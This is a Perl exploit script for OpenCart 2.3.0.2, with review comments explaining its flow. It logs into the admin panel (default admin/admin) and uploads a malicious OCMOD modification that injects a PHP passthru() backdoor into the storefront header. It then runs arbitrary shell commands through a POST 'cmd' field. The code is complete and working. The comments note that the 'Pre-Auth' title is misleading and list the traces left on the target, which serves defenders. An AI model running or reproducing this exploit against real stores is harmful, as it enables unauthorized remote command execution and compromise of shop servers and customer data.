1#!/usr/bin/perl -w
2#
3# Opencart 2.3.0.2 Pre-Auth Remote Command Execution CLI Exploit
4#
5# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
6#
7#
8# # [test@localhost opencart]$ perl opencart_rce.pl http://192.168.1.1/oc2302/
9# # [
10# # [ Opencart 2.3.0.2 Pre-Auth Remote Command Execution CLI Exploit
11# # [ ==============================================================
12# # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
13# # [
14# # [ Disclaimer:
15# # [ This or previous programs are for Educational purpose
16# # [ ONLY. Do not use it without permission. The usual
17# # [ disclaimer applies, especially the fact that Todor Donev
18# # [ is not liable for any damages caused by direct or
19# # [ indirect use of the information or functionality provided
20# # [ by these programs. The author or any Internet provider
21# # [ bears NO responsibility for content or misuse of these
22# # [ programs or any derivatives thereof. By using these programs
23# # [ you accept the fact that any damage (dataloss, system crash,
24# # [ system compromise, etc.) caused by the use of these programs
25# # [ are not Todor Donev's responsibility.
26# # [
27# # [ Use them at your own risk!
28# # [
29# # [ Initializing the browser
30# # [ Authorization..
31# # [ Initializing the payload
32# # [ Uploading the payload
33# # [ Exploiting..
34# # [ Cleaning the temp payload file
35# # [ ==============================================================
36# # uid=48(apache) gid=48(apache) groups=48(apache)
37# # [test@localhost opencart]$
38# #
39#
40#
41# https://www.owasp.org/index.php/Security_by_Design_Principles
42#
43#
use strict;
use JSON;
use HTTP::Request;
use HTTP::Request::Common;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTTP::CookieJar::LWP;
#
# Flow of this script, as written below:
#   1. log in to the OpenCart admin panel with a username/password
#      (route=common/login) and read the session token from the redirect;
#   2. write an OCMOD XML modification file to the current directory and
#      upload it through the admin extension installer
#      (route=extension/installer/upload);
#   3. run the installer steps returned as JSON, then call
#      route=extension/modification/refresh so the modification is applied;
#   4. POST a `cmd` parameter to the storefront home page, which the
#      injected PHP passes to passthru(), and print the output found
#      between two "0WNED" markers;
#   5. refresh modifications once more (the injected PHP has already
#      deleted its own row from the `modification` table) and delete the
#      local XML file.
#
# NOTE(review): despite the "Pre-Auth" title in the banner, every step
# after the login depends on the admin session token obtained with the
# supplied credentials (defaults admin/admin), so this is a post-auth,
# admin-credentialed chain. Observable artifacts on the target for the
# same reason: an admin login, an upload of a 19-uppercase-letter
# "*.ocmod.xml" file, two modification refresh requests, and a POST with
# a `cmd` field to index.php?route=common/home whose response body
# contains "0WNED".
#
# Flush STDOUT after every print so progress lines appear immediately.
$| = 1;
# Positional CLI arguments with defaults; none of them are validated
# beyond the "$host starts with http" check further down.
my $host = shift || 'https://localhost/'; # Full path url to the store
my $user = shift || 'admin';
my $pass = shift || 'admin';
my $cmd = shift || 'id';
# Pipes in the command are rewritten to ';' before sending; the reason is
# not stated in the script.
$cmd =~ s/\|/\;/g;
print "[
[ Opencart 2.3.0.2 Pre-Auth Remote Command Execution CLI Exploit
[ ==============================================================
[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>
[
[ Disclaimer:
[ This or previous programs are for Educational purpose
[ ONLY. Do not use it without permission. The usual
[ disclaimer applies, especially the fact that Todor Donev
[ is not liable for any damages caused by direct or
[ indirect use of the information or functionality provided
[ by these programs. The author or any Internet provider
[ bears NO responsibility for content or misuse of these
[ programs or any derivatives thereof. By using these programs
[ you accept the fact that any damage (dataloss, system crash,
[ system compromise, etc.) caused by the use of these programs
[ are not Todor Donev's responsibility.
[
[ Use them at your own risk!
[
";
# Usage message and exit unless the first argument looks like a URL.
print "[ e.g. perl $0 https://target/ <username> <password> <command>\n" and exit if ($host !~ m/^http/);
print "[ Initializing the browser\n";
# Presumably a randomly chosen browser User-Agent string (WWW::UserAgent::Random).
my $user_agent = rand_ua("browsers");
my $jar = HTTP::CookieJar::LWP->new();
# verify_hostname => 0 disables TLS hostname verification for https targets.
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
 $browser->timeout(90);
 $browser->cookie_jar($jar);
 $browser->agent($user_agent);
# Admin login. The form body is built by string interpolation, so the
# username/password are not URL-encoded.
my $target = $host."admin/index.php?route=common/login";
my $request = HTTP::Request->new (POST => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host],"username=$user&password=$pass&redirect=$target");
print "[ Authorization..\n";
# $request->authorization_basic('USERNAME', 'PASSWORD');
# NOTE(review): LWP::UserAgent->request returns a response object even on
# transport failure (rather than a false value), so this `or die` — and the
# identical ones below — is unlikely to ever fire; failures surface via ->code.
my $content = $browser->request($request) or die "Exploit Failed: $!";
print "[ 401 Unauthorized!\n" and exit if ($content->code eq '401');
# A successful login is recognised by a redirect whose Location carries a
# "token=" query parameter; everything after "token=" is kept as the token.
if (defined ($content->header('Location')) && ($content->header('Location') =~ m/token=(.*)/)){
 my $token = $1;
 my $rce_catch = $host."admin/index.php?route=extension/installer/upload";
 print "[ Initializing the payload\n";
 # Random 19-character name made of the letters 'A'..'Y' (chr 65..89).
 my $name;
 for (0..18) { $name .= chr( int(rand(25) + 65) ); }
 my $filename = $name.".ocmod.xml";
 undef $name;

# OCMOD modification: inserts a PHP block into
# catalog/controller/common/header.php before the "// For page specific css"
# comment. When a POST request carries a `cmd` field the block echoes
# "0WNED", calls passthru() on the value, echoes "0WNED" again, and deletes
# the modification's own row (matched by name) from the `modification`
# table.
my $payload = '<?xml version="1.0" encoding="utf-8"?>
<modification>
 <name><![CDATA['.$filename.']]></name>
 <code><![CDATA['.$filename.']]></code>
 <version>1.337</version>
 <author></author>
 <link></link>

 <file path="catalog/controller/common/header.php">
 <operation>
 <search><![CDATA[// For page specific css]]></search>
 <add position="before"><![CDATA[ if(isset($this->request->post[\'cmd\'])){
 echo "0WNED";
 $cmd = ($this->request->post[\'cmd\']);
 passthru($cmd);
 echo "0WNED";
 $this->db->query("DELETE FROM `" . DB_PREFIX . "modification` WHERE `name` LIKE \''.$filename.'\'");
 }]]></add>
 </operation>
 </file>
</modification>
';
 # Writes the XML to the current working directory ($ENV{PWD}).
 # NOTE(review): two-argument open with the mode inside the string, an
 # interpolated path, and a bareword filehandle — the usual review flags.
 # flock mode 2 is LOCK_EX; truncate/seek are redundant after opening with '>'.
 open (TEMP, " > $ENV{PWD}/$filename") or die "[ Error: $ENV{PWD}/$filename $!";
 flock (TEMP, 2);
 truncate (TEMP, 0);
 seek (TEMP, 0, 0);
 print (TEMP $payload);
 close (TEMP);
# multipart/form-data upload of the file as field "file", with the admin token.
my $upload_payload = HTTP::Request::Common::POST($rce_catch."&token=".$token, Content_Type => 'form-data', Referer => $target, Content => [ file => ["$ENV{PWD}/$filename"]]);
print "[ Uploading the payload\n";
my $response = $browser->request($upload_payload) or die "[ Exploit Failed: $!";

my $json = JSON->new->pretty;

 # Dies with an uncaught exception if the installer answers with non-JSON
 # (e.g. an HTML error page).
 my $json_object = $json->decode($response->content);

# The installer reports permission problems through an "error" key.
print ("[ Exploit failed! You do not have permission to upload the payload.\n") and exit if ($json_object->{'error'});

 print "[ Exploiting..\n";

 # Each "step" entry returned by the installer (presumably its install
 # sub-steps) is POSTed back with its "path"; any non-200 aborts.
 for my $item( @{$json_object->{step}} ){
 my $xml_inst_request = HTTP::Request->new (POST => $item->{url}, [Content_Type => "application/x-www-form-urlencoded", Referer => $host], "path=".$item->{path});
 my $xml_inst_response = $browser->request($xml_inst_request) or die "[ Exploit Failed: $!";
 print "[ Exploit failed.\n" and exit if ($xml_inst_response->code ne '200');
 }
 # Modification refresh; the flow relies on this to make the modified
 # header.php take effect (exact server-side behaviour not visible here).
 my $refresh_url = $host."admin/index.php?route=extension/modification/refresh&redir_inst=1&token=$token";
 my $xml_refresh_request = HTTP::Request->new (GET => $refresh_url,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
 $browser->request($xml_refresh_request) or die "[ Exploit Failed: $!";
 # Trigger: POST `cmd` to the storefront home page ($cmd not URL-encoded).
 my $exploiting = $host."index.php?route=common/home";
 my $exploiting_request = HTTP::Request->new (POST => $exploiting,[Content_Type => "application/x-www-form-urlencoded",Referer => $host],"cmd=$cmd");
 my $command_response = $browser->request($exploiting_request) or die "[ Exploit Failed: $!";
 print "[ Cleaning the temp payload file\n";
 # Only the local copy is removed; the script does nothing about the
 # uploaded file on the target.
 unlink("$ENV{PWD}/$filename") or die "[ Error: $ENV{PWD}/$filename $!";
 # In scalar context m//gs yields 1 or "", so `ne ''` means "matched";
 # $1 then holds the text between the two "0WNED" markers.
 if (($command_response->as_string() =~ m/0WNED(.*?)0WNED/gs) ne ''){
 print "[ ==============================================================\n";
 print $1;
 } else {
 print "[ ==============================================================\n";
 print "[ Exploit failed: $cmd: command not found or isn't correct.\n";
 }
 # Second refresh after the injected PHP has deleted its own modification
 # row — presumably reverts the modified header.php.
 $browser->request($xml_refresh_request) or die "[ Exploit Failed: $!";
 exit;

} else {
 print "[ Exploit failed! You are not authorized. Wrong Username/Password.\n";
 exit;
}